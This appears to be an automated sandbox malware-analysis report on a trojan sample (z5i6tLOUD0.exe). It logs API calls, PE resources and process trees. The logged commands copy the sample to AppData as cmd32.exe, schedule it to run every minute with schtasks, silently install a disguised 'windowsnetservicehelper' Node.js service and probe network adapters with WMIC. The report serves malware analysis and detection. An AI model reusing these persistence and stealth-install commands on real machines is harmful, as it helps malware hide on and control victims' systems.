          Source: svchost.exe, 00000031.00000003.524831727.0000015A1418D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-09-09T22:39:32.7082563Z||.||e86fc780-362a-40ac-a492-00a82914d51a||1152921505695235378||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2022-09-09T22:38:30.0902509Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
          Source: svchost.exe, 00000031.00000003.524991165.0000015A1419E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.524831727.0000015A1418D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-09-09T22:39:32.7082563Z||.||e86fc780-362a-40ac-a492-00a82914d51a||1152921505695235378||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2022-09-09T22:38:30.0902509Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_0040558F
          Source: windowsnetservicehelper.exe, 0000001D.00000002.389856694.0000000000C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 168
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03B72DB80_2_03B72DB8
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03D2F4680_2_03D2F468
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03D2EB980_2_03D2EB98
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03D2E8500_2_03D2E850
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADE3D418_2_03ADE3D4
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADF1D818_2_03ADF1D8
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADE64418_2_03ADE644
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADDAC818_2_03ADDAC8
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03ADDD6418_2_03ADDD64
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00404DCC20_2_00404DCC
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00406AF220_2_00406AF2
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeCode function: 0_2_03D28260 CreateProcessAsUserA,0_2_03D28260
          Source: z5i6tLOUD0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: z5i6tLOUD0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cmd32.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cmd32.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: node.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC4C7C RemoveService,OpenSCManagerW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,18_2_03BC4C7C
          Source: z5i6tLOUD0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_004034A5
          Source: WingFtpServer.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
          Source: WingFtpServer.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Source: z5i6tLOUD0.exe, 00000000.00000000.274189838.00000000019F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs z5i6tLOUD0.exe
          Source: z5i6tLOUD0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z5i6tLOUD0.exe.logJump to behavior
          Source: classification engineClassification label: mal60.troj.evad.winEXE@75/22@2/3
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: InstallService,OpenSCManagerW,CreateServiceW,CloseServiceHandle,18_2_03BC48BC
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC4B94 ChangeServicePath,OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,18_2_03BC4B94
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpFile created: C:\Program Files (x86)\WindowsNetServiceJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
          Source: z5i6tLOUD0.exeReversingLabs: Detection: 60%
          Source: z5i6tLOUD0.exeVirustotal: Detection: 28%
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\z5i6tLOUD0.exe "C:\Users\user\Desktop\z5i6tLOUD0.exe"
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\z5i6tLOUD0.exe" "C:\Users\user\AppData\Roaming\cmd32.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 168
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Users\user\AppData\Local\Temp\WingFtpServer.exe "C:\Users\user\AppData\Local\Temp\WingFtpServer.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp "C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess created: C:\Users\user\AppData\Local\Temp\wns22DB.tmp windowsnetservicehelpersetup.exe /S
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\net.exe "net" stop windowsnetservicehelper.exe
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop windowsnetservicehelper.exe
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "taskkill" /IM windowsnetservicehelper.exe /T /F
          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\sc.exe "sc" delete windowsnetservicehelper.exe
          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" install
          Source: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" start
          Source: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe
          Source: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeProcess created: C:\Program Files (x86)\WindowsNetService\node.exe C:\Program Files (x86)\WindowsNetService\node.exe" "C:\Program Files (x86)\WindowsNetService\service.js
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /fJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\z5i6tLOUD0.exe" "C:\Users\user\AppData\Roaming\cmd32.exeJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Users\user\AppData\Local\Temp\WingFtpServer.exe "C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /fJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp "C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpProcess created: C:\Users\user\AppData\Local\Temp\wns22DB.tmp windowsnetservicehelpersetup.exe /SJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\net.exe "net" stop windowsnetservicehelper.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "taskkill" /IM windowsnetservicehelper.exe /T /FJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\sc.exe "sc" delete windowsnetservicehelper.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" installJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" startJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop windowsnetservicehelper.exeJump to behavior
          Source: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeProcess created: C:\Program Files (x86)\WindowsNetService\node.exe C:\Program Files (x86)\WindowsNetService\node.exe" "C:\Program Files (x86)\WindowsNetService\service.js
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
